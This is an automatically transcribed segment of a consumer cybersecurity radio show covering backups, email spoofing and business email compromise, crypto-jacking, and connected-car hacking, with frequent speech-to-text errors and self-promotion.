the best file system out there I've never ever had a problem with it. It's just crazy. I can send you more information. If you ever interested, just email me@craigpeterson.com. Anytime. Be glad to send you the open source information, whatever you need. But what had happened is. [00:33:13] Somehow the boot disk of that FMC, that, that firewall controller had been corrupted. So we thought, oh, okay, no problem. Let's look at our backups. Yeah, hadn't backed up since October, 2019. Yeah, and we didn't know it had been silently failing. Obviously we're putting stuff in place to stop that from ever happening again. [00:33:43] So we are monitoring the backups, the, that network. Of desks that was making up that storage area network that had the redundancy failed because the machine itself, somehow corrupted its file system, ext four file system right then are supposed to be corruptible, but the journal was messed up and it was man, what a headache. [00:34:07] And so they thought, okay, you're going to have to re-install. And we were sitting there saying, oh, you're kidding me. Reinstalling this FMC controller means we've got to configure our clients, firewalls that are being controlled from this FMC, all of their networks, all of their devices. We had to put it out. [00:34:23] This is going to take a couple of weeks. So because I've been doing this for so long. I was able to boot up an optics desk and Mount the file system and go in manually underneath the whole FMC, this whole firewall controller and make repairs to it. Got it repaired, and then got it back online. So thank goodness for that. [00:34:49] It happens to the best of us, but I have to say I have never had a new client where they had good backups. Ever. Okay. That, and now that should tell you something. So if you are a business, a small business, whatever it might be, check your backups, double check them. Now, when we're running backups, we do a couple of things. [00:35:14] We go ahead and make sure the backup is good. So remember I mentioned that we have. Backup server that sits onsite. Usually it depends on the size of the client. But sits onsite at the client's site. So it will perform the backup and then tries to actual restore of that backup to make sure it's good. [00:35:35] And we can even. Client, depending on what they want. So a higher level, if a machine goes down, let's say it catches fire, or disk explodes in it, or completely fails. We can actually bring that machine online inside our backup server or the customer. Yeah, how's that for fancy and bring it back online in just a matter of minutes instead of days or weeks. [00:36:04] So that's true too. If that machine had been a ransom had this data, you raised whatever might've happened to it. We can restore it now. We've never had to knock on wood, except when there was a physical problem with the machine and as. Starting from scratching it, that machine, the new machine online in four hours or less. [00:36:28] And it's really cool the way it works. If you like this stuff, man, it is great. Okay. Protecting your data. I'm rambling a little bit here. You need an archival service there's companies out there like iron mountain, you can at your local bank, depending on the bank. It ain't like it used to be, get a box, right? [00:36:50] A special box in the vault that you. The tapes and other things in nowadays there's cloud options, virtual tape backup options, which is a lot of what we use and we do. Okay. We also use straight cloud at the very bottom end again. It's not located on the network. It's up in the cloud. It's double encrypted. [00:37:13] It's absolutely the way to do now if you're going to have a backup and if that backup, you want to be secure, it must not be accessible. To the attacker, you've got to put some literal air space between your backups and the cyber criminals. It's called an air gap. So there's no way for them to get to it. [00:37:37] Okay. Now I want you to consider seriously using tape these a LTO. These linear tape drives. They've been around for a long time, but their cartridges you can pull in and out. And they're huge. They they're physically small, but they can hold terabytes worth of data. They're absolutely amazing. There's some great disk based backup systems as what we do. [00:38:02] Some of them are been around a long time and they can be quite reasonably. Price. All right. So it's something for you to consider, but you've got to have at least that air gap in order to make sure that you're going to be protected. What should you be looking for in a backup system? This is called 3, 2, 2 1, which means maintain at least three copies of your data store the backups on two different meters. [00:38:31] Store at least one of the copies at an offsite location store, at least one of the copies offline, and be sure to have verified backups without air. Okay. Does that sound a little complicated? 3, 2, 1, 1 0 is what it's called. Just to be 3, 2, 1. Now it's 3, 2, 1, 1 0. I can send you Karen put together a special report on this based on our research. [00:38:57] And I can share that with you. Absolutely free. Hey guys, if you want it, you got it. But you got to ask me, just email me M e@craigpeterson.com. This is absolutely essential. If you're a small business, a tiny business to do it this way. Let me tell you, okay, this is just huge. Physical backups should be stored off site. [00:39:19] I mentioned the bank fault. A lot of people just go ahead and take them home with. That might be a desk. It might be a tape. It can be a little bit complicated to do. And I've picked up customers that thought they were backing up. They were using a USB drive. They were putting it in due to flee every Monday. [00:39:41] And then every Wednesday, what happened? Every Wednesday they bring in Wednesdays desk and then they bring that disc home and then Thursday, they bring in the Thursday disc. And none of them had been working. Okay. So be very careful. All of your backups should be encrypted. We encrypted at the customer site and then we reencrypt it when we bring it over to us. [00:40:06] Okay. Keys are essential. Particularly if you're using a cloud-based backup, don't use the same keys across multiple backups. Very important there. You should have some good procedures that are well-documented test, test your restores because very frequently. We find they don't work. In fact, that's the number one problem, right? [00:40:30] If they had just tried to restore, even once from their backup, they would've known they had problems. And get those backups scheduled on a regular schedule. Okay. So there's a lot more offline backups and more that we can talk about another time, but this is important. If you want any help, send me an email, just put backups in the subject line. [00:40:55] I'll send you some stuff. Email me, M e@craigpeterson.com. Now I am more than glad to help. Pretty much anybody out there. I'm not going to help. What about blah, blah, Amir Putin. But anybody else I'll help, but you got to reach out. Okay. You listen here. And I know some of this stuff is over some of our heads, some of your heads, you're the best and brightest. [00:41:20] That's why you're listening and I'll help you out. I'll send you some information. That's going to get you on the right track. Me M e@craigpeterson.com. That's Craig Peterson, S O N have a great day. [00:41:35] We just got an email this week from a customer and they're saying, oh no, my email has been hacked. What does that mean was a really hacked, we're going to talk right now about email spoofing, which is a very big deal. [00:41:51] Emails spoofing is being a problem for a long time, really? Since the 1970s. I remember when I got my first spoofed email back in the eighties and they was really a little bit confusing. [00:42:05] I went into it more detail, of course, being a very technical kind of guy and looked behind the curtains, figured out what was going on. Just shook my head. I marveled at some people. Why would you do this sort of thing? The whole idea behind email spoofing is for you to receive an email, looks like it's from someone that it's not now, you've all seen examples of this. [00:42:30] Everybody has. And those emails that are supposedly from the bank, or maybe from Amazon or some other type of business or family friend, this is part of what we call social engineering, where the bad guys are using a little bit about what they know about you, or maybe another person in order to. Frankly, fool you. [00:42:54] That's what spoofing really is. There were a lot of email accounts that were hacked over the last what, 30, 40 years. And you might remember this people sending out an email saying, oh, my account got hacked because you just got emails. Back in the day, what people were trying to do is break into people's email accounts and then the bad guys after having broken in now knew everybody that was in the contact list from the account that was just broken into. [00:43:29] Now they know, Hey, listen, this person sends an email. Maybe I can just pretend I'm them. Days it, the same thing still happens. But now typically what you're seeing is a more directed attack. So a person might even look in that email account that they've broken into and poke around a little bit and find out, oh, okay. [00:43:52] So this person's account I just broken to is a purchasing manager at a big. So then they take the next step or maybe this tab after that and try and figure out. Okay, so now what do I do? Oh, okay. So really what I can do now is send fake purchase orders or send fake requests for money. I've seen in the past with clients that we've picked up because the email was acting strangely where a bad guy went ahead, found. [00:44:25] Invoices that have been sent out by the purchasing person and the send the invoices out and changed the pay to information on the invoice. So they took the PDFs that they found on the file server of the invoices went in and changed them, change the account that they wanted, the funds ACH into. And once they had that happen, they just sent the invoice out again saying overdue. [00:44:54] Off goes in the email and the company receives it and says, oh okay, I need to pay this invoice. Now. Sometimes it marked them overdue. Sometimes they didn't mark them overdue. I've seen both cases and now the money gets sent off and that invoice gets paid and then gets paid to the wrong person. [00:45:13] Or maybe they go ahead and they don't send the invoice out, but they just send a little notification saying, Hey, our account has changed. Make sure you. Direct all future payments to this account. Instead. Now you might be thinking wait a second here. Now they send this email out. It's going to go into a bank account. [00:45:33] I can recover the money while no, you can't. Because what they're doing is they are using mules. Now you've heard of meals before. He might've even seen that recent Clint Eastwood movie. I think it was called. But typically when we think of mules, as people we're thinking about people who are running drugs well, in this case, the bad guys use mules in order to move money around. [00:45:59] And now sometimes the people know what they're doing. The FBI has had some really great arrests of some people who were doing this, particularly out in California, some of them cleaned. Yeah. I didn't know what was happening. It was just somebody, asked me to send money. It's like the Nigerian scam where the Nigeria in the Nigerian scam, they say, Hey I'm, I'm Nigerian prince, you've heard of these things before. And I need to get my money out of the country. I need to place to put them. And so if you have a us account, I'm going to transfer money into it. You can keep a thousand dollars of that 5,000 and I'm going to wire in just as a fee. Thanks for doing this. I, this is so important and it's such a hurry and I'm going to send you the. [00:46:46] What they'll often do is send you a money order. It couldn't be a bank check, could be a lot of things, and then you go ahead and you cash it and oh, okay. Or cash just fine. And then you wire the $4,000 off to the bad guy. The bad guy gets the money and is off. Running in the meantime, your bank is trying to clear that bank check or that money order. [00:47:14] And they find out that there is no money there because frankly what might've happened? I, this is one I've seen, I'm telling you about a story w we helped to solve this problem, but I had taken out a real money order from a bank, and then they made copies of it. Basically, they just forged it. And so they forged a hundred copies of it. [00:47:36] So people thought they were getting a legitimate money order. And in some cases, the banks where the money order was, you mean deposited, did conf confirm it? They called up the source bank. Oh yeah. Yeah. That's a legit money order and then they all hit within a week or two. And now the, you are left holding the bag. [00:47:58] So that's one thing that happens. But typically with these mules, the money comes to them in that account. They are supposed to then take that money and put it in their PayPal account and send it off to the next. And it might try jump to through two or three different people, and then it ends up overseas and the bad guys have gotten so good at this and have the cooperation of some small countries, sometimes bigger countries that they actually own. [00:48:30] The bank overseas of the money ultimately gets transferred into. And of course there's no way to get the money back. It's a real. So with spoofing, they're trying to trick you into believing the emails from someone that you know, or someone that you can trust. Or as I said, maybe a business partner of some sort in most cases, it's some sort of a colleague, a vendor or a trusted brand. [00:48:58] And so they exploit the trust that you have, and they ask you to do something or divulge information. They'll try and get you to do something. So there's more complexity tax. Like the ones that I just explained here that are going after financial employees, there might be some, an accountant, a bookkeeper, or bill payer and receivables payables. [00:49:24] I've seen CFO attacks, but the really the spoofed email message looks legitimate on the surface. They'll use the legitimate logo of the company that they're trying to pretend that they're from. For instance, PayPal. Phishing attack. They have a spoofed email sender and typical email clients like you might be using for instance, on Microsoft outlook. [00:49:48] The sender address is shown on the message, but most of the time nowadays the mail clients hide the actual email address, or if you just glance at it, it looks legit. You've seen those before these forged email headers. Yeah, it gets to be a problem. Now we use some software from Cisco that we buy. [00:50:13] You have to buy. I think it's a thousand licenses at a time, but there were some others out there, Cisco again, by far the best and this, the software. Receives the email. So before it even ends up in the exchange server or somewhere else online, that email then goes through that Cisco server. They are comparing it to billions of other emails that they've seen, including in real time emails that are. [00:50:41] Right now. And they'll look at the header of the email message. You can do that as well. With any email client, you can look at the header, Microsoft and outlook calls, it view source. But if you look at the email header, you'll see received. Headers that are in there. So say, receive colon from, and they'll give a name of a domain and then you'll see another received header and give another name of a machine. [00:51:08] And it'll include the IP address might be IVF IPV four of your six, and you can then follow it all the way through. So what'll happen is partway through. You'll see, it took a hop that is. Not legitimate. That's where it comes in. Nowadays, if you have an email address for your business, man, a domain, you need to be publishing what are called SPF records. [00:51:37] And those SPF records are looked at there compared to make sure that the email is properly signed and is from. The correct sender. There's a SPF records. There's a mother's too, that you should have in place, but you'll see that in the headers, if you're looking in the header. So it gets pretty complicated. [00:51:59] The SPF, which is the sender policy framework is a security protocol standard. It's been around now for almost a decade. It's working in conjunction with what are called domain based message, authentication, reporting, and conformance. Heather's D mark headers to stop malware and phishing attacks. And they are very good if you use them properly, but unfortunately when I look, I would say it's still 95% of emails that are being sent by businesses are not using this email spoofing and protection. [00:52:35] So have a look at that and I can send you a couple articles on it. If you're in trusted Craig Peter sohn.com. [00:52:46] So we've established that email spoofing happens. What are the stats to this? And how can you further protect yourself from email spoofing? Particularly if you're not the technical type controlling DNS records, that's what's up right. [00:53:02] Everybody Craig Peter sawn here, your cybersecurity strategist. And you're listening to news radio, w G a N a M five 60 and 98.5 FM. Join me on the morning. Drive Wednesday mornings at 7 34. Of course in the am. There's so much going on in the cybersecurity world. It affects all of us. Now, I think back to the good old days 40 years ago where we weren't worried about a lot of this stuff, spoofing, et cetera. [00:53:36] But what we're talking about right now is 3.1 billion domain spoof. Emails sent every day. That's a huge thing. More than 90% of cyber attacks. Start with an email message. Email spoofing and phishing have had a worldwide impact costing probably $26 billion over the last five years. A couple of years ago, the FBI, this is 2019. [00:54:07] Reported that about a house. A million cyber attacks were successful. 24% of them were email-based and the average scam tricked users out of $75,000. Yeah. So it's no wonder so many people are concerned about their email and whether or not those pieces of email are really a problem for them. And then anybody else. [00:54:34] So a common attack that uses spoofing is CEO fraud, also known as business, email compromise. So this is where the attacker is spoofing or modifying, pretending to be a certain person that they're not they're impersonating an executive or owner, maybe of a business. And it targets. People in the financial accounting or accounts payable departments or even the engineering department. [00:55:01] And that's what happened with one of our clients this week. They got a very interesting spoofed email. So even when you're smart and you're paying attention, you can be tricked the Canadian city treasurer. Tricked into transferring a hundred grand from taxpayer funds, Mattel tricked into sending 3 million to an accountant, China, a bank in Belgium, tricked into sending the attackers 70 million Euro. [00:55:31] It happens and I have seen it personally with many businesses out there. So how do you protect yourself from email? Spoofing now, even with email security in place, there's some malicious email messages that are still going to get through to the inboxes. Now we're able to stop better than 96% of them just based on our stats. [00:55:54] In fact, it's very rare that one gets through, but here are some things you can do and watch out for whether you're an employee responsible for financial decisions, or maybe you're someone who is. Personal email at work. Here's some tricks here. So get your pencil ready. Number one, never click links to access a web. [00:56:19] Where you're asked to log in, always type in the official URL into your browser and authenticate on the browser. In other words, if you get an email from your bank or someone else, and there's a link in there to click that says, Hey oh man, here's some real problems. You got to respond right away. [00:56:42] Don't do that go to paypal.com or your bank or your vendor's site, just type it into your browser, even though you can hover over the email link and see what it is. Sometimes it can be perfectly legitimate and yet it looks weird. For instance, when I send out my emails that people subscribe to that right there on Craig peterson.com, the links are going to come from the people that handle my email lists for me, because I send out thousands of emails at a time to people that have asked to get those emails. [00:57:22] So I use a service and the services taking those links, modifying them somewhat in fact dramatically. And using that to make sure the delivery happened, people are opening it and that I'm not bothering you. So you can unsubscribe next step. You can, if you want to dig in more, look at the email headers. [00:57:45] Now they're different for every email client. If you're using outlook, you have to select the email, basically in the left-hand side. Okay. You're going to control, click on that email and we'll come up and you'll see something that says view source. So in the outlook world, they hide it from you. [00:58:06] If you're using a Mac and Mac mail, all you have to do is go to up in the menu bar email and view, header and cut off. There it is. I have many times in the past just left that turned on. So I'm always seeing the headers that reminds me to keep a look at those headers. So if you look in the header, And if the email sender is let me put it this way. [00:58:31] If the person who is supposed to have sent it to you is doing headers proper, properly. You're going to see. A received SPF section of the headers and right in there, you can look for a pass or fail and response, and that'll tell you if it's legit. So in other words, let's use PayPal as an example, PayPal has these records that it publishes that say all of our emails are going to come from this server or that server of. [00:59:04] And I do the same thing for my domains and we do the same thing for our clients domains. So it's something that you can really count on if you're doing it right, that this section of the headers. And that's why I was talking about earlier. If you have an email that your sending out from your domain and you don't have those proper headers in it, there's no way. [00:59:31] To truly authenticate it. Now I go a step further and I use GPG in order to sign most of my emails. Now I don't do this for the trainings and other things, but direct personal emails from me will usually be cryptographically signed. So you can verify that it was me that sent it. Another thing you can do is copy and paste the text, the body of that email into a search engine. [01:00:03] Of course I recommend duck go in most cases. And the chances are that frankly they've sent it to multiple people. That's why I was saying our Cisco based email filter. That's what it does, it looks for common portions of the body for emails that are known to be bad, be suspicious of email from official sources like the IRS, they're not going to be sending you email out of the blue most places. Aren't obviously don't open attachments from people that you don't. Special suspicious ones, particularly people we'll send PDFs that are infected. It's been a real problem. They'll send of course word docs, Excel docs, et cetera, as well. [01:00:54] And the more. I have a sense of urgency or danger. That's a part of the email should really get your suspicions up, frankly, because suggesting something bad is going to happen. If you don't act quickly, that kind of gets around part of your brain and it's the fight or flight, right? Hey, I gotta take care of this. [01:01:17] I gotta take care of this right away. Ah, and maybe you. So those are the main things that you can pay attention to. In the emails, if you are a tech person, and you're trying to figure this out, how can I make the emails safer for our company? You can always drop me an email as well. Me, M e@craigpeterson.com. [01:01:43] I can send you to a couple of good sources. I'll have to put together a training as well on how to do this, but as individually. At least from my standpoint, a lot of this is common sense and unfortunately the bad guys have made it. So email is something we can no longer completely trust. Spoofing is a problem. [01:02:05] As I said, we just saw it again this week. Thank goodness. It was all caught and stopped. The account was not. It was just a spoofed email from an account outside the organization that was act Craig peterson.com. Stick around. [01:02:24] The value of crypto coins has been going down lately quite a bit across the board, not just Bitcoin, but the amount of crypto mining and crypto jacking going on. That hasn't gone down much at all. [01:02:48] hi, I'm Craig Peter Sohn, your cyber security strategist. And you're listening to news radio, w G a N a M five 60 and FM nine. Point five, you can join me on the morning drive every Wednesday morning at 7 34, Matt and I go over some of the latest in news. You know about crypto coins, at least a little bit, right? [01:03:15] These are the things like Bitcoin and others that are obstensively private, but in reality, aren't that private. If you receive coins and you spend coins, you are probably trackable. And if you can't spend that, the crypto currencies, why even bother getting it in the first place. One of the big drivers behind the price of these crypto currencies has been criminal activity. [01:03:48] We've talked about that before. Here's the problem we're seeing more and more nowadays, even though the price of Bitcoin might go down 30%, which it has, and it's gone down in bigger chunks before. It does not mean that the bad guys don't want more of it. And what better way to mine, cryptocurrency then to not have to pay for. [01:04:15] So the bad guys have been doing something called crypto jacking. This is where criminals are using really ransomware like tactics and poisoned website to get your computer, even your smartphone to mine, cryptocurrencies for. No mining, a Bitcoin can cost as much in electric bills that are in fact more in electric bills. [01:04:43] Then you get from the value of the Bitcoin itself. So it's expensive for them to run it. Some countries like China have said, no, you're not doing it anymore because they're using so much electricity here in the U S we've even got crypto mining companies that are buying. Old power plant coal-fired or otherwise, and are generating their own electricity there locally in order to be able to mine cryptocurrencies efficiently, effectively so that they can make some profit from it. [01:05:18] It's really quite the world out there. Some people have complained about their smartphone getting really hot. Their battery only lasts maybe an hour and it's supposed to last all day. Sometimes what's happened is your smartphone has been hijacked. It's been crypto jacked. So your smartphone, they're not designed to sit there and do heavy computing all day long. [01:05:45] Like a workstation is even your regular desktop computer. Probably isn't. To be able to handle day long mining that has to happen. In fact, the most efficient way to do crypto mining of course is using specialized hardware, but that costs them money. So why not just crypto Jack? All right. There are two primary ways. [01:06:09] Hackers have been getting victims, computers to secretly mine. Cryptocurrencies one is to trick them into loading. Crypto mining code onto their computers. So that's done through various types of fishing, light tactics. They get a legitimate looking email that tricks people into clicking on a link and the link runs code. [01:06:30] Now what's interesting is you don't, even for cryptocurrency crypto jacket, you don't even have to download a program in. To have your computer start mining cryptocurrencies for the bad guys. They can use your browser to run a crypto mining script. And it runs in the background. As you work right, using up electricity, using up the CPU on your computer. [01:06:58] They also will put it into ads. They'll put it on a website and your browser goes ahead and runs the code beautifully. So they're really trying to maximize their returns. That's the basics of crypto jacking what's been particularly bad lately has been the hackers breaking into cloud account. And then using those accounts to mine cryptocurrency, one of the trainings that I had on my Wednesday wisdoms has to do with password stuffing and my Wednesday wisdoms, you can get by just subscribing to my email over there@craigpeterson.com. [01:07:44] But what happens here is they find your email address. They find. Password on one of these hacks that is occurred on the dark web. You weren't on the dark web, but your username or email address and password are there on the dark web. And then they just try it. So a big site like Amazon, or maybe it was your IBM also has cloud services can be sitting there running along very well, having fun. [01:08:16] Life's good. And. Then they go ahead and try your email address and password to try and break in. Now, you know how I keep telling everybody use a good password manager and this week I actually changed my opinion on password managers. So you know, that I really like the password manager that you can get from one password.com. [01:08:44] It really is fantastic. Particularly for businesses, various types of enterprises, one password.com. However, where I have changed is that some of these browsers nowadays, particularly thinking about Firefox Google Chrome safari, if you're particularly, if you're on a Mac, all have built in password managers that are actually. [01:09:09] Good. Now they check. Have I been poned, which is a site I've talked to you guys about for years. To make sure that your accounts are reasonably safe than not being found on the dark web, the new password that it came up with or that you want to use. They check that as well. Make sure it's not in use. So here's an example here. [01:09:32] This is a guy by the name of Chris. He lives out in Seattle, Washington, and he makes mobile apps for local publishers. Just this year, new year's day, he got an alert from Amazon web services. Now Amazon web services, of course, cloud service. They've got some really nice stuff, starting with light ship and going up from there, I've used various services from them for well, since they started offering the services over very many years and. [01:10:04] They allow you to have a computer and you can get whatever size computer you want to, or fraction of a computer. You want to, he got this alert because it said that he owed more than $53,000 for a month's worth of hosts. Now his typical Amazon bill is between a hundred and 150 bucks a month. My typical Amazon bell is now 50 to maybe $80 a month. [01:10:34] I cannot imagine getting a $53,000 bill from our friends at Amazon. So the poor guy was just totally freaking out, which is a very big deal. So I'm looking at an article from insider that you can find a business insider.com. They were able to confirm that, yes, indeed. He got this $53,000 bill from Amazon and yes, indeed. [01:11:00] It looks like his account had been hacked by cryptocurrency miners. So these guys can run up just incredibly large charges for the raw computing power. They need to produce some of these digital cryptocurrencies, like Bitcoin there's many others out there. But this isn't new. This is happening all of the time. [01:11:23] Google reported late last year, that 86% of account breaches on its Google cloud platform were used to perform cryptocurrency mining. So make sure you are using a good password manager that generates good passwords. And I have a special report on passwords. You can download it immediately when you sign up for. [01:11:48] My email, my weekly email newsletter@craigpeterson.com and it tells you what to do, how to do it. What is a good password? What the thinking is because it's changed on passwords, but do that and use two factor authentication. Multi-factor authentication as well. And I talk about that in that special report too. [01:12:11] And visit me online. Sign up right now. Craig Peter sohn.com. [01:12:17] We're moving closer and closer to completely automated cars, but we want to talk right now about car hacks, because there was an interesting one this week that has to do with Tesla. And we'll talk about some of the other hacks on car. [01:12:33] Connected cars are coming our way in a very big way. [01:12:38] We just talked about the shutdown of two G and 3g in our cars. We, it wasn't really our cars, right? Two G 3g. That was for our cell phones. That was. Years ago course now for four GLTE 5g, even 10 G is being used in the labs. Right now. It's hard to think about some of those older technologies, but they were being used and they were being used by cars, primarily for the navigation features. [01:13:13] Some cars use these data links, if you will, that are really on the cell phone network in order to do remote things like remote start. For instance, I have a friend who's Subaru. Of course was using that. And now she's got to do an upgrade on her car because that 3g technology is going away depending on the carrier, by the way, some of it's going away sooner. [01:13:40] Some of it's going away later, but it'll all be gone at the end of 2020. What are we looking at? As we look into the future, I'm really concerned. I don't want to buy one of these new cars at the same time as I do, because they are cool, but I don't want to buy one of those because of the real problem that we could have of what well of having that car. [01:14:07] I need an upgrade and not been able to do it. I watched a video of a guy who took a Tesla that hadn't been damaged badly in a flood, and it was able to buy it for cheap. Why? Because Tesla will not sell you new motors and a new batteries for a car like that. So he got the car for cheap. He found a Chevy Camaro that had been wrecked, but its engine and transmission were just fine. [01:14:37] He ripped everything out of the Tesla and went ahead after that, cause you got to clean that out, and water damage. You spray wash all to the inside. He got right down to the aluminum, everything that wasn't part of the core aluminum chassis was gone. And then he built it back up again. He managed to keep all of those Tesla systems working, that, that screen that you have upfront that does the temperature control, cruise maps, everything out. [01:15:09] He kept that it was able to work. The, automated stuff, cruise control type stuff. And now he had a very hot car that looked like a Tesla. He took it out to SEMA, which is pretty cool. I'd love to see that, but it was a Tesla with a big V8 gasoline engine in it. He's done a, quite a good job on it. [01:15:33] It was quite amazing to see it took them months. It was him and some of his buddies. These new cars are even more connected than my friend Subaru is they get downloads from the. Some of them are using Wi-Fi and 5g. Really one of the big promises of 5g is, Hey, our cars can talk to each other because now you can get a millisecond delay in going from one car to another versus what you have today, which can be a half a second or more, which can be the difference between having a rear end collision and being able to stop in time when it comes to these automated system. [01:16:15] So they are more connected. They connect to the wifi in your homes. They connect to obviously the 5g network, which is where things are going right now. But what's happening with the hackers because really what we're talking about, isn't a computer on wheels. Oh no. Dozens of computers inside that car and your car has a network inside of it and has had for many years, this can bus network and even fancier ones nowadays that connect all of your systems together. [01:16:50] So your entertainment system, for instance, is connected to this network. And that was used. You might remember a couple of years ago on a Chrysler product where the bad guy installed. Or using the thumb drive onto that entertainment system and had a reporter drive that car down the road. This is all known. [01:17:13] It was all controlled. And was able to the bad guy right there, the demonstration in this case, I guess you'd call them a white hat hacker. He drove that car right off the road while the reporter was trying to steer otherwise because cars nowadays don't have a direct linkage between anything in any. [01:17:36] That's why I love my 1980 Mercedes TESOL. You turn the steering wheel. It isn't act